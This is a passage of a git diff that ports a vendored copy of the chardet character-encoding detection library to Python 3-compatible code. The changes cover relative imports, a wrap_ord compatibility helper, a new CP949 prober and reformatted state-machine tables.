+MINIMUM_DATA_THRESHOLD = 3 + class CharDistributionAnalysis: def __init__(self): - self._mCharToFreqOrder = None # Mapping table to get frequency order from char order (get from GetOrder()) - self._mTableSize = None # Size of above table - self._mTypicalDistributionRatio = None # This is a constant value which varies from language to language, used in calculating confidence. See http://www.mozilla.org/projects/intl/UniversalCharsetDetection.html for further detail. + # Mapping table to get frequency order from char order (get from + # GetOrder()) + self._mCharToFreqOrder = None + self._mTableSize = None # Size of above table + # This is a constant value which varies from language to language, + # used in calculating confidence. See + # http://www.mozilla.org/projects/intl/UniversalCharsetDetection.html + # for further detail. + self._mTypicalDistributionRatio = None self.reset() def reset(self): """reset analyser, clear any state""" - self._mDone = constants.False # If this flag is set to constants.True, detection is done and conclusion has been made - self._mTotalChars = 0 # Total characters encountered - self._mFreqChars = 0 # The number of characters whose frequency order is less than 512 + # If this flag is set to True, detection is done and conclusion has + # been made + self._mDone = False + self._mTotalChars = 0 # Total characters encountered + # The number of characters whose frequency order is less than 512 + self._mFreqChars = 0 - def feed(self, aStr, aCharLen): + def feed(self, aBuf, aCharLen): """feed a character with known length""" if aCharLen == 2: # we only care about 2-bytes character in our distribution analysis - order = self.get_order(aStr) + order = self.get_order(aBuf) else: order = -1 if order >= 0: @@ -65,12 +81,14 @@ class CharDistributionAnalysis: def get_confidence(self): """return confidence based on existing data""" - # if we didn't receive any character in our consideration range, return negative answer - if self._mTotalChars <= 0: + # if we didn't receive any character in our consideration range, + # return negative answer + if self._mTotalChars <= 0 or self._mFreqChars <= MINIMUM_DATA_THRESHOLD: return SURE_NO if self._mTotalChars != self._mFreqChars: - r = self._mFreqChars / ((self._mTotalChars - self._mFreqChars) * self._mTypicalDistributionRatio) + r = (self._mFreqChars / ((self._mTotalChars - self._mFreqChars) + * self._mTypicalDistributionRatio)) if r < SURE_YES: return r @@ -78,16 +96,18 @@ class CharDistributionAnalysis: return SURE_YES def got_enough_data(self): - # It is not necessary to receive all data to draw conclusion. For charset detection, - # certain amount of data is enough + # It is not necessary to receive all data to draw conclusion. + # For charset detection, certain amount of data is enough return self._mTotalChars > ENOUGH_DATA_THRESHOLD - def get_order(self, aStr): - # We do not handle characters based on the original encoding string, but - # convert this encoding string to a number, here called order. - # This allows multiple encodings of a language to share one frequency table. + def get_order(self, aBuf): + # We do not handle characters based on the original encoding string, + # but convert this encoding string to a number, here called order. + # This allows multiple encodings of a language to share one frequency + # table. return -1 + class EUCTWDistributionAnalysis(CharDistributionAnalysis): def __init__(self): CharDistributionAnalysis.__init__(self) @@ -95,16 +115,18 @@ class EUCTWDistributionAnalysis(CharDistributionAnalysis): self._mTableSize = EUCTW_TABLE_SIZE self._mTypicalDistributionRatio = EUCTW_TYPICAL_DISTRIBUTION_RATIO - def get_order(self, aStr): - # for euc-TW encoding, we are interested + def get_order(self, aBuf): + # for euc-TW encoding, we are interested # first byte range: 0xc4 -- 0xfe # second byte range: 0xa1 -- 0xfe # no validation needed here. State machine has done that - if aStr[0] >= '\xC4': - return 94 * (ord(aStr[0]) - 0xC4) + ord(aStr[1]) - 0xA1 + first_char = wrap_ord(aBuf[0]) + if first_char >= 0xC4: + return 94 * (first_char - 0xC4) + wrap_ord(aBuf[1]) - 0xA1 else: return -1 + class EUCKRDistributionAnalysis(CharDistributionAnalysis): def __init__(self): CharDistributionAnalysis.__init__(self) @@ -112,15 +134,17 @@ class EUCKRDistributionAnalysis(CharDistributionAnalysis): self._mTableSize = EUCKR_TABLE_SIZE self._mTypicalDistributionRatio = EUCKR_TYPICAL_DISTRIBUTION_RATIO - def get_order(self, aStr): - # for euc-KR encoding, we are interested + def get_order(self, aBuf): + # for euc-KR encoding, we are interested # first byte range: 0xb0 -- 0xfe # second byte range: 0xa1 -- 0xfe # no validation needed here. State machine has done that - if aStr[0] >= '\xB0': - return 94 * (ord(aStr[0]) - 0xB0) + ord(aStr[1]) - 0xA1 + first_char = wrap_ord(aBuf[0]) + if first_char >= 0xB0: + return 94 * (first_char - 0xB0) + wrap_ord(aBuf[1]) - 0xA1 else: - return -1; + return -1 + class GB2312DistributionAnalysis(CharDistributionAnalysis): def __init__(self): @@ -129,15 +153,17 @@ class GB2312DistributionAnalysis(CharDistributionAnalysis): self._mTableSize = GB2312_TABLE_SIZE self._mTypicalDistributionRatio = GB2312_TYPICAL_DISTRIBUTION_RATIO - def get_order(self, aStr): - # for GB2312 encoding, we are interested + def get_order(self, aBuf): + # for GB2312 encoding, we are interested # first byte range: 0xb0 -- 0xfe # second byte range: 0xa1 -- 0xfe # no validation needed here. State machine has done that - if (aStr[0] >= '\xB0') and (aStr[1] >= '\xA1'): - return 94 * (ord(aStr[0]) - 0xB0) + ord(aStr[1]) - 0xA1 + first_char, second_char = wrap_ord(aBuf[0]), wrap_ord(aBuf[1]) + if (first_char >= 0xB0) and (second_char >= 0xA1): + return 94 * (first_char - 0xB0) + second_char - 0xA1 else: - return -1; + return -1 + class Big5DistributionAnalysis(CharDistributionAnalysis): def __init__(self): @@ -146,19 +172,21 @@ class Big5DistributionAnalysis(CharDistributionAnalysis): self._mTableSize = BIG5_TABLE_SIZE self._mTypicalDistributionRatio = BIG5_TYPICAL_DISTRIBUTION_RATIO - def get_order(self, aStr): - # for big5 encoding, we are interested + def get_order(self, aBuf): + # for big5 encoding, we are interested # first byte range: 0xa4 -- 0xfe # second byte range: 0x40 -- 0x7e , 0xa1 -- 0xfe # no validation needed here. State machine has done that - if aStr[0] >= '\xA4': - if aStr[1] >= '\xA1': - return 157 * (ord(aStr[0]) - 0xA4) + ord(aStr[1]) - 0xA1 + 63 + first_char, second_char = wrap_ord(aBuf[0]), wrap_ord(aBuf[1]) + if first_char >= 0xA4: + if second_char >= 0xA1: + return 157 * (first_char - 0xA4) + second_char - 0xA1 + 63 else: - return 157 * (ord(aStr[0]) - 0xA4) + ord(aStr[1]) - 0x40 + return 157 * (first_char - 0xA4) + second_char - 0x40 else: return -1 + class SJISDistributionAnalysis(CharDistributionAnalysis): def __init__(self): CharDistributionAnalysis.__init__(self) @@ -166,22 +194,24 @@ class SJISDistributionAnalysis(CharDistributionAnalysis): self._mTableSize = JIS_TABLE_SIZE self._mTypicalDistributionRatio = JIS_TYPICAL_DISTRIBUTION_RATIO - def get_order(self, aStr): - # for sjis encoding, we are interested + def get_order(self, aBuf): + # for sjis encoding, we are interested # first byte range: 0x81 -- 0x9f , 0xe0 -- 0xfe # second byte range: 0x40 -- 0x7e, 0x81 -- oxfe # no validation needed here. State machine has done that - if (aStr[0] >= '\x81') and (aStr[0] <= '\x9F'): - order = 188 * (ord(aStr[0]) - 0x81) - elif (aStr[0] >= '\xE0') and (aStr[0] <= '\xEF'): - order = 188 * (ord(aStr[0]) - 0xE0 + 31) + first_char, second_char = wrap_ord(aBuf[0]), wrap_ord(aBuf[1]) + if (first_char >= 0x81) and (first_char <= 0x9F): + order = 188 * (first_char - 0x81) + elif (first_char >= 0xE0) and (first_char <= 0xEF): + order = 188 * (first_char - 0xE0 + 31) else: - return -1; - order = order + ord(aStr[1]) - 0x40 - if aStr[1] > '\x7F': - order =- 1 + return -1 + order = order + second_char - 0x40 + if second_char > 0x7F: + order = -1 return order + class EUCJPDistributionAnalysis(CharDistributionAnalysis): def __init__(self): CharDistributionAnalysis.__init__(self) @@ -189,12 +219,13 @@ class EUCJPDistributionAnalysis(CharDistributionAnalysis): self._mTableSize = JIS_TABLE_SIZE self._mTypicalDistributionRatio = JIS_TYPICAL_DISTRIBUTION_RATIO - def get_order(self, aStr): - # for euc-JP encoding, we are interested + def get_order(self, aBuf): + # for euc-JP encoding, we are interested # first byte range: 0xa0 -- 0xfe # second byte range: 0xa1 -- 0xfe # no validation needed here. State machine has done that - if aStr[0] >= '\xA0': - return 94 * (ord(aStr[0]) - 0xA1) + ord(aStr[1]) - 0xa1 + char = wrap_ord(aBuf[0]) + if char >= 0xA0: + return 94 * (char - 0xA1) + wrap_ord(aBuf[1]) - 0xa1 else: return -1 diff --git a/thirdparty/chardet/charsetgroupprober.py b/thirdparty/chardet/charsetgroupprober.py index 9037af480..85e7a1c67 100644 --- a/thirdparty/chardet/charsetgroupprober.py +++ b/thirdparty/chardet/charsetgroupprober.py @@ -25,8 +25,10 @@ # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from charsetprober import CharSetProber +from . import constants +import sys +from .charsetprober import CharSetProber + class CharSetGroupProber(CharSetProber): def __init__(self): @@ -41,28 +43,32 @@ class CharSetGroupProber(CharSetProber): for prober in self._mProbers: if prober: prober.reset() - prober.active = constants.True + prober.active = True self._mActiveNum += 1 self._mBestGuessProber = None def get_charset_name(self): if not self._mBestGuessProber: self.get_confidence() - if not self._mBestGuessProber: return None + if not self._mBestGuessProber: + return None # self._mBestGuessProber = self._mProbers[0] return self._mBestGuessProber.get_charset_name() def feed(self, aBuf): for prober in self._mProbers: - if not prober: continue - if not prober.active: continue + if not prober: + continue + if not prober.active: + continue st = prober.feed(aBuf) - if not st: continue + if not st: + continue if st == constants.eFoundIt: self._mBestGuessProber = prober return self.get_state() elif st == constants.eNotMe: - prober.active = constants.False + prober.active = False self._mActiveNum -= 1 if self._mActiveNum <= 0: self._mState = constants.eNotMe @@ -78,18 +84,22 @@ class CharSetGroupProber(CharSetProber): bestConf = 0.0 self._mBestGuessProber = None for prober in self._mProbers: - if not prober: continue + if not prober: + continue if not prober.active: if constants._debug: - sys.stderr.write(prober.get_charset_name() + ' not active\n') + sys.stderr.write(prober.get_charset_name() + + ' not active\n') continue cf = prober.get_confidence() if constants._debug: - sys.stderr.write('%s confidence = %s\n' % (prober.get_charset_name(), cf)) + sys.stderr.write('%s confidence = %s\n' % + (prober.get_charset_name(), cf)) if bestConf < cf: bestConf = cf self._mBestGuessProber = prober - if not self._mBestGuessProber: return 0.0 + if not self._mBestGuessProber: + return 0.0 return bestConf # else: # self._mBestGuessProber = self._mProbers[0] diff --git a/thirdparty/chardet/charsetprober.py b/thirdparty/chardet/charsetprober.py index 6ad198cd4..97581712c 100644 --- a/thirdparty/chardet/charsetprober.py +++ b/thirdparty/chardet/charsetprober.py @@ -1,11 +1,11 @@ ######################## BEGIN LICENSE BLOCK ######################## # The Original Code is Mozilla Universal charset detector code. -# +# # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 2001 # the Initial Developer. All Rights Reserved. -# +# # Contributor(s): # Mark Pilgrim - port to Python # Shy Shalom - original C code @@ -14,19 +14,21 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, re +from . import constants +import re + class CharSetProber: def __init__(self): @@ -48,11 +50,11 @@ class CharSetProber: return 0.0 def filter_high_bit_only(self, aBuf): - aBuf = re.sub(r'([\x00-\x7F])+', ' ', aBuf) + aBuf = re.sub(b'([\x00-\x7F])+', b' ', aBuf) return aBuf def filter_without_english_letters(self, aBuf): - aBuf = re.sub(r'([A-Za-z])+', ' ', aBuf) + aBuf = re.sub(b'([A-Za-z])+', b' ', aBuf) return aBuf def filter_with_english_letters(self, aBuf): diff --git a/thirdparty/chardet/codingstatemachine.py b/thirdparty/chardet/codingstatemachine.py index 452d3b0a0..8dd8c9179 100644 --- a/thirdparty/chardet/codingstatemachine.py +++ b/thirdparty/chardet/codingstatemachine.py @@ -13,19 +13,21 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from constants import eStart, eError, eItsMe +from .constants import eStart +from .compat import wrap_ord + class CodingStateMachine: def __init__(self, sm): @@ -40,12 +42,15 @@ class CodingStateMachine: def next_state(self, c): # for each byte we get its class # if it is first byte, we also get byte length - byteCls = self._mModel['classTable'][ord(c)] + # PY3K: aBuf is a byte stream, so c is an int, not a byte + byteCls = self._mModel['classTable'][wrap_ord(c)] if self._mCurrentState == eStart: self._mCurrentBytePos = 0 self._mCurrentCharLen = self._mModel['charLenTable'][byteCls] # from byte's class and stateTable, we get its next state - self._mCurrentState = self._mModel['stateTable'][self._mCurrentState * self._mModel['classFactor'] + byteCls] + curr_state = (self._mCurrentState * self._mModel['classFactor'] + + byteCls) + self._mCurrentState = self._mModel['stateTable'][curr_state] self._mCurrentBytePos += 1 return self._mCurrentState diff --git a/thirdparty/chardet/compat.py b/thirdparty/chardet/compat.py new file mode 100644 index 000000000..d9e30addf --- /dev/null +++ b/thirdparty/chardet/compat.py @@ -0,0 +1,34 @@ +######################## BEGIN LICENSE BLOCK ######################## +# Contributor(s): +# Ian Cordasco - port to Python +# +# This library is free software; you can redistribute it and/or +# modify it under the terms of the GNU Lesser General Public +# License as published by the Free Software Foundation; either +# version 2.1 of the License, or (at your option) any later version. +# +# This library is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# Lesser General Public License for more details. +# +# You should have received a copy of the GNU Lesser General Public +# License along with this library; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA +# 02110-1301 USA +######################### END LICENSE BLOCK ######################### + +import sys + + +if sys.version_info < (3, 0): + base_str = (str, unicode) +else: + base_str = (bytes, str) + + +def wrap_ord(a): + if sys.version_info < (3, 0) and isinstance(a, base_str): + return ord(a) + else: + return a diff --git a/thirdparty/chardet/constants.py b/thirdparty/chardet/constants.py index e94e226b0..e4d148b3c 100644 --- a/thirdparty/chardet/constants.py +++ b/thirdparty/chardet/constants.py @@ -37,11 +37,3 @@ eError = 1 eItsMe = 2 SHORTCUT_THRESHOLD = 0.95 - -import __builtin__ -if not hasattr(__builtin__, 'False'): - False = 0 - True = 1 -else: - False = __builtin__.False - True = __builtin__.True diff --git a/thirdparty/chardet/cp949prober.py b/thirdparty/chardet/cp949prober.py new file mode 100644 index 000000000..ff4272f82 --- /dev/null +++ b/thirdparty/chardet/cp949prober.py @@ -0,0 +1,44 @@ +######################## BEGIN LICENSE BLOCK ######################## +# The Original Code is mozilla.org code. +# +# The Initial Developer of the Original Code is +# Netscape Communications Corporation. +# Portions created by the Initial Developer are Copyright (C) 1998 +# the Initial Developer. All Rights Reserved. +# +# Contributor(s): +# Mark Pilgrim - port to Python +# +# This library is free software; you can redistribute it and/or +# modify it under the terms of the GNU Lesser General Public +# License as published by the Free Software Foundation; either +# version 2.1 of the License, or (at your option) any later version. +# +# This library is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# Lesser General Public License for more details. +# +# You should have received a copy of the GNU Lesser General Public +# License along with this library; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA +# 02110-1301 USA +######################### END LICENSE BLOCK ######################### + +from .mbcharsetprober import MultiByteCharSetProber +from .codingstatemachine import CodingStateMachine +from .chardistribution import EUCKRDistributionAnalysis +from .mbcssm import CP949SMModel + + +class CP949Prober(MultiByteCharSetProber): + def __init__(self): + MultiByteCharSetProber.__init__(self) + self._mCodingSM = CodingStateMachine(CP949SMModel) + # NOTE: CP949 is a superset of EUC-KR, so the distribution should be + # not different. + self._mDistributionAnalyzer = EUCKRDistributionAnalysis() + self.reset() + + def get_charset_name(self): + return "CP949" diff --git a/thirdparty/chardet/escprober.py b/thirdparty/chardet/escprober.py index c2e979e7b..80a844ff3 100644 --- a/thirdparty/chardet/escprober.py +++ b/thirdparty/chardet/escprober.py @@ -13,39 +13,43 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from escsm import HZSMModel, ISO2022CNSMModel, ISO2022JPSMModel, ISO2022KRSMModel -from charsetprober import CharSetProber -from codingstatemachine import CodingStateMachine +from . import constants +from .escsm import (HZSMModel, ISO2022CNSMModel, ISO2022JPSMModel, + ISO2022KRSMModel) +from .charsetprober import CharSetProber +from .codingstatemachine import CodingStateMachine +from .compat import wrap_ord + class EscCharSetProber(CharSetProber): def __init__(self): CharSetProber.__init__(self) - self._mCodingSM = [ \ + self._mCodingSM = [ CodingStateMachine(HZSMModel), CodingStateMachine(ISO2022CNSMModel), CodingStateMachine(ISO2022JPSMModel), CodingStateMachine(ISO2022KRSMModel) - ] + ] self.reset() def reset(self): CharSetProber.reset(self) for codingSM in self._mCodingSM: - if not codingSM: continue - codingSM.active = constants.True + if not codingSM: + continue + codingSM.active = True codingSM.reset() self._mActiveSM = len(self._mCodingSM) self._mDetectedCharset = None @@ -61,19 +65,22 @@ class EscCharSetProber(CharSetProber): def feed(self, aBuf): for c in aBuf: + # PY3K: aBuf is a byte array, so c is an int, not a byte for codingSM in self._mCodingSM: - if not codingSM: continue - if not codingSM.active: continue - codingState = codingSM.next_state(c) + if not codingSM: + continue + if not codingSM.active: + continue + codingState = codingSM.next_state(wrap_ord(c)) if codingState == constants.eError: - codingSM.active = constants.False + codingSM.active = False self._mActiveSM -= 1 if self._mActiveSM <= 0: self._mState = constants.eNotMe return self.get_state() elif codingState == constants.eItsMe: self._mState = constants.eFoundIt - self._mDetectedCharset = codingSM.get_coding_state_machine() + self._mDetectedCharset = codingSM.get_coding_state_machine() # nopep8 return self.get_state() return self.get_state() diff --git a/thirdparty/chardet/escsm.py b/thirdparty/chardet/escsm.py index 9fa22952e..bd302b4c6 100644 --- a/thirdparty/chardet/escsm.py +++ b/thirdparty/chardet/escsm.py @@ -13,62 +13,62 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from constants import eStart, eError, eItsMe +from .constants import eStart, eError, eItsMe -HZ_cls = ( \ -1,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,0,0, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,0,0,0,0, # 20 - 27 -0,0,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -0,0,0,0,0,0,0,0, # 40 - 47 -0,0,0,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,4,0,5,2,0, # 78 - 7f -1,1,1,1,1,1,1,1, # 80 - 87 -1,1,1,1,1,1,1,1, # 88 - 8f -1,1,1,1,1,1,1,1, # 90 - 97 -1,1,1,1,1,1,1,1, # 98 - 9f -1,1,1,1,1,1,1,1, # a0 - a7 -1,1,1,1,1,1,1,1, # a8 - af -1,1,1,1,1,1,1,1, # b0 - b7 -1,1,1,1,1,1,1,1, # b8 - bf -1,1,1,1,1,1,1,1, # c0 - c7 -1,1,1,1,1,1,1,1, # c8 - cf -1,1,1,1,1,1,1,1, # d0 - d7 -1,1,1,1,1,1,1,1, # d8 - df -1,1,1,1,1,1,1,1, # e0 - e7 -1,1,1,1,1,1,1,1, # e8 - ef -1,1,1,1,1,1,1,1, # f0 - f7 -1,1,1,1,1,1,1,1, # f8 - ff +HZ_cls = ( +1,0,0,0,0,0,0,0, # 00 - 07 +0,0,0,0,0,0,0,0, # 08 - 0f +0,0,0,0,0,0,0,0, # 10 - 17 +0,0,0,1,0,0,0,0, # 18 - 1f +0,0,0,0,0,0,0,0, # 20 - 27 +0,0,0,0,0,0,0,0, # 28 - 2f +0,0,0,0,0,0,0,0, # 30 - 37 +0,0,0,0,0,0,0,0, # 38 - 3f +0,0,0,0,0,0,0,0, # 40 - 47 +0,0,0,0,0,0,0,0, # 48 - 4f +0,0,0,0,0,0,0,0, # 50 - 57 +0,0,0,0,0,0,0,0, # 58 - 5f +0,0,0,0,0,0,0,0, # 60 - 67 +0,0,0,0,0,0,0,0, # 68 - 6f +0,0,0,0,0,0,0,0, # 70 - 77 +0,0,0,4,0,5,2,0, # 78 - 7f +1,1,1,1,1,1,1,1, # 80 - 87 +1,1,1,1,1,1,1,1, # 88 - 8f +1,1,1,1,1,1,1,1, # 90 - 97 +1,1,1,1,1,1,1,1, # 98 - 9f +1,1,1,1,1,1,1,1, # a0 - a7 +1,1,1,1,1,1,1,1, # a8 - af +1,1,1,1,1,1,1,1, # b0 - b7 +1,1,1,1,1,1,1,1, # b8 - bf +1,1,1,1,1,1,1,1, # c0 - c7 +1,1,1,1,1,1,1,1, # c8 - cf +1,1,1,1,1,1,1,1, # d0 - d7 +1,1,1,1,1,1,1,1, # d8 - df +1,1,1,1,1,1,1,1, # e0 - e7 +1,1,1,1,1,1,1,1, # e8 - ef +1,1,1,1,1,1,1,1, # f0 - f7 +1,1,1,1,1,1,1,1, # f8 - ff ) -HZ_st = ( \ -eStart,eError, 3,eStart,eStart,eStart,eError,eError,# 00-07 -eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f -eItsMe,eItsMe,eError,eError,eStart,eStart, 4,eError,# 10-17 - 5,eError, 6,eError, 5, 5, 4,eError,# 18-1f - 4,eError, 4, 4, 4,eError, 4,eError,# 20-27 - 4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f +HZ_st = ( +eStart,eError, 3,eStart,eStart,eStart,eError,eError,# 00-07 +eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f +eItsMe,eItsMe,eError,eError,eStart,eStart, 4,eError,# 10-17 + 5,eError, 6,eError, 5, 5, 4,eError,# 18-1f + 4,eError, 4, 4, 4,eError, 4,eError,# 20-27 + 4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f ) HZCharLenTable = (0, 0, 0, 0, 0, 0) @@ -79,50 +79,50 @@ HZSMModel = {'classTable': HZ_cls, 'charLenTable': HZCharLenTable, 'name': "HZ-GB-2312"} -ISO2022CN_cls = ( \ -2,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,0,0, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,0,0,0,0, # 20 - 27 -0,3,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -0,0,0,4,0,0,0,0, # 40 - 47 -0,0,0,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,0,0,0,0,0, # 78 - 7f -2,2,2,2,2,2,2,2, # 80 - 87 -2,2,2,2,2,2,2,2, # 88 - 8f -2,2,2,2,2,2,2,2, # 90 - 97 -2,2,2,2,2,2,2,2, # 98 - 9f -2,2,2,2,2,2,2,2, # a0 - a7 -2,2,2,2,2,2,2,2, # a8 - af -2,2,2,2,2,2,2,2, # b0 - b7 -2,2,2,2,2,2,2,2, # b8 - bf -2,2,2,2,2,2,2,2, # c0 - c7 -2,2,2,2,2,2,2,2, # c8 - cf -2,2,2,2,2,2,2,2, # d0 - d7 -2,2,2,2,2,2,2,2, # d8 - df -2,2,2,2,2,2,2,2, # e0 - e7 -2,2,2,2,2,2,2,2, # e8 - ef -2,2,2,2,2,2,2,2, # f0 - f7 -2,2,2,2,2,2,2,2, # f8 - ff +ISO2022CN_cls = ( +2,0,0,0,0,0,0,0, # 00 - 07 +0,0,0,0,0,0,0,0, # 08 - 0f +0,0,0,0,0,0,0,0, # 10 - 17 +0,0,0,1,0,0,0,0, # 18 - 1f +0,0,0,0,0,0,0,0, # 20 - 27 +0,3,0,0,0,0,0,0, # 28 - 2f +0,0,0,0,0,0,0,0, # 30 - 37 +0,0,0,0,0,0,0,0, # 38 - 3f +0,0,0,4,0,0,0,0, # 40 - 47 +0,0,0,0,0,0,0,0, # 48 - 4f +0,0,0,0,0,0,0,0, # 50 - 57 +0,0,0,0,0,0,0,0, # 58 - 5f +0,0,0,0,0,0,0,0, # 60 - 67 +0,0,0,0,0,0,0,0, # 68 - 6f +0,0,0,0,0,0,0,0, # 70 - 77 +0,0,0,0,0,0,0,0, # 78 - 7f +2,2,2,2,2,2,2,2, # 80 - 87 +2,2,2,2,2,2,2,2, # 88 - 8f +2,2,2,2,2,2,2,2, # 90 - 97 +2,2,2,2,2,2,2,2, # 98 - 9f +2,2,2,2,2,2,2,2, # a0 - a7 +2,2,2,2,2,2,2,2, # a8 - af +2,2,2,2,2,2,2,2, # b0 - b7 +2,2,2,2,2,2,2,2, # b8 - bf +2,2,2,2,2,2,2,2, # c0 - c7 +2,2,2,2,2,2,2,2, # c8 - cf +2,2,2,2,2,2,2,2, # d0 - d7 +2,2,2,2,2,2,2,2, # d8 - df +2,2,2,2,2,2,2,2, # e0 - e7 +2,2,2,2,2,2,2,2, # e8 - ef +2,2,2,2,2,2,2,2, # f0 - f7 +2,2,2,2,2,2,2,2, # f8 - ff ) -ISO2022CN_st = ( \ -eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07 -eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f -eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17 -eItsMe,eItsMe,eItsMe,eError,eError,eError, 4,eError,# 18-1f -eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27 - 5, 6,eError,eError,eError,eError,eError,eError,# 28-2f -eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37 -eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f +ISO2022CN_st = ( +eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07 +eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f +eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17 +eItsMe,eItsMe,eItsMe,eError,eError,eError, 4,eError,# 18-1f +eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27 + 5, 6,eError,eError,eError,eError,eError,eError,# 28-2f +eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37 +eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f ) ISO2022CNCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0) @@ -133,51 +133,51 @@ ISO2022CNSMModel = {'classTable': ISO2022CN_cls, 'charLenTable': ISO2022CNCharLenTable, 'name': "ISO-2022-CN"} -ISO2022JP_cls = ( \ -2,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,2,2, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,7,0,0,0, # 20 - 27 -3,0,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -6,0,4,0,8,0,0,0, # 40 - 47 -0,9,5,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,0,0,0,0,0, # 78 - 7f -2,2,2,2,2,2,2,2, # 80 - 87 -2,2,2,2,2,2,2,2, # 88 - 8f -2,2,2,2,2,2,2,2, # 90 - 97 -2,2,2,2,2,2,2,2, # 98 - 9f -2,2,2,2,2,2,2,2, # a0 - a7 -2,2,2,2,2,2,2,2, # a8 - af -2,2,2,2,2,2,2,2, # b0 - b7 -2,2,2,2,2,2,2,2, # b8 - bf -2,2,2,2,2,2,2,2, # c0 - c7 -2,2,2,2,2,2,2,2, # c8 - cf -2,2,2,2,2,2,2,2, # d0 - d7 -2,2,2,2,2,2,2,2, # d8 - df -2,2,2,2,2,2,2,2, # e0 - e7 